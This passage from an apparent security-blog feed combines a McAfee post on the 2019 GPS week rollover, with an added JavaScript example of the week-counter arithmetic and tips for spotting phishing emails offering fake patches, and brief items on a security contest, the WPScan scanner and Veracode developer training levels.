You may be wondering, what will cause this rollover issue? GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into a foot of location error.
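
The arithmetic behind the rollover, as an added example that is not part of the McAfee post: a 10-bit week counter wraps after 1,024 weeks, a receiver whose firmware is hard-wired to the 1999–2019 epoch jumps back to August 1999, and the usual firmware mitigation (a pivot date that the receiver treats as the earliest possible “now”) buys another 1,024 weeks counted from that pivot, after which it fails in the same way. The function names are my own. Dates are computed in GPS system time, which ignores leap seconds and therefore falls a few seconds after the UTC instants quoted above, so the two rollovers appear here as August 22, 1999 and April 7, 2019.

```javascript
// Added example (not from the McAfee post): the 10-bit GPS week counter, the jump
// back to 1999 on a receiver hard-wired to one 1024-week epoch, and the pivot-date
// mitigation. Function names are illustrative. Dates are GPS system time (no leap
// seconds), a few seconds after the UTC instants quoted in the post.
const GPS_EPOCH_MS = Date.UTC(1980, 0, 6);       // GPS week 0 began on 6 January 1980
const WEEK_MS = 7 * 24 * 60 * 60 * 1000;
const WEEK_ROLLOVER = 1 << 10;                   // 10-bit field: wraps every 1024 weeks (~19.6 years)

// Full, unbounded week number since the GPS epoch for a calendar date (month is 1-12).
function fullWeek(year, month, day) {
  return Math.floor((Date.UTC(year, month - 1, day) - GPS_EPOCH_MS) / WEEK_MS);
}

// What the satellite message actually carries: only the low 10 bits of the week.
function broadcastWeek(full) {
  return full % WEEK_ROLLOVER;
}

// Start of the given full week as an ISO date string (GPS system time).
function weekToDate(full) {
  return new Date(GPS_EPOCH_MS + full * WEEK_MS).toISOString().slice(0, 10);
}

// Legacy receiver: firmware assumes one fixed epoch (0 = 1980-1999, 1 = 1999-2019, ...),
// so when the broadcast counter wraps the date falls back to the start of that epoch.
function legacyDate(week10, hardwiredEpoch) {
  return weekToDate(hardwiredEpoch * WEEK_ROLLOVER + week10);
}

// Mitigated receiver: resolve the 10-bit week to the first full week on or after a
// pivot date (typically the firmware build date). Correct for 1024 weeks from the pivot.
function pivotDate(week10, pivotYear, pivotMonth, pivotDay) {
  const pivot = fullWeek(pivotYear, pivotMonth, pivotDay);
  let full = pivot - (pivot % WEEK_ROLLOVER) + week10;
  if (full < pivot) full += WEEK_ROLLOVER;
  return weekToDate(full);
}

// The April 2019 event: full week 2048 is broadcast as week 0.
function rolloverDemo() {
  const full = fullWeek(2019, 4, 7);
  const w10 = broadcastWeek(full);
  return {
    fullWeek: full,
    broadcast: w10,
    legacyEpoch1: legacyDate(w10, 1),                        // receiver stuck in the 1999-2019 epoch
    pivot2018: pivotDate(w10, 2018, 1, 1),                   // updated firmware with a 2018 pivot
    pivot1999TwoWeeksLater: pivotDate(w10 + 2, 1999, 9, 1),  // a 1999 pivot has itself expired
  };
}
```

The last field is the important one for patch planning: a pivot date only postpones the problem by 1,024 weeks, so a receiver patched around the first rollover in 1999 is exactly the device that fails in 2019, and the fix is a firmware update that moves the pivot forward, not anything the user can do from a link in an email.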

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up to date. However, given the media attention this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.

March Hackness: A Recap

At our core, Security Innovation is a company helping to educate the world about Application Security wherever we can. Whether it be through our Computer Based Training, Security Testing or Cyber Range, we always get excited to see our customers learn and improve their security skills. A perfect example is Brandon Evans, a software engineer who recently won our AppSec Cali event and followed that up by finding all 55 issues in our InstaFriends site. Congratulations Brandon!

Scan WordPress websites for vulnerabilities WPScan Kali Linux

WPScan is a black box vulnerability scanner for WordPress websites. WPScan comes pre-installed in Kali Linux. Kali Linux is a popular Linux distribution built on Debian, and it comes with many of the best ethical hacking tools pre-installed. If you’re not using Kali Linux and you […]

The post Scan WordPress websites for vulnerabilities WPScan Kali Linux appeared first on HackingVision.

New eLearning Learner Levels Streamline Verified Progress

Before customers buy from you, they ask “Can you prove that your application is secure, and that you will protect our data if we give it to you?” Companies around the world struggle to answer this question, especially with the advancement of DevOps and rapid changes/deployment of applications into production. As such, we launched Verified to help you prove to your customers that you adopt security best practices for your applications and the developers that support them on an ongoing basis.

Veracode Verified is a three-tier maturity program that includes several training elements. For example, to reach the Verified Team tier, one requirement is to select and train a security champion. A requirement to reach Verified Continuous is to roll out security fundamentals training to all developers working on an application. 

Veracode Introduces Learning Levels

In order to help companies track the maturity of their eLearning program and their progress toward Verified tiers, Veracode launched learning levels in the eLearning product. The new enhancement to eLearning includes the following:

Learning Levels: There are three levels that individuals can reach within the platform. Each level has a requirement in terms of specific courses a user must complete in order to obtain that level.

Level 1 – Developer Security Fundamentals

Level 2 – Verified Team Security Champion

Level 3 – Verified Continuous Security Champion

Visit our website for more details on developer training.

Platform Badges: There are now badges next to user names that align to the level the user has reached. This allows managers to quickly identify that their teams have met their policy requirements for eLearning.

Certificate: Users can also download a certificate that shows their name, the level they reached, and the date they achieved their status.

Reporting: Managers can download a report for their teams on the levels they achieved, and the date it was achieved.

A Variety of Developer Training that Meets Your Specific Needs

With the increased speed of development, plus security shifting “left,” developers need to catch security-related defects on their own as often as possible. However, most developers have had no opportunities to learn secure coding, in school or on the job. Veracode offers application security leaders the chance to engage developers with various types of training, from self-service eLearning to fully customizable on-site workshops. 

Learn more about proving the security of your development process with our Verified program, and the different training elements needed to become Verified.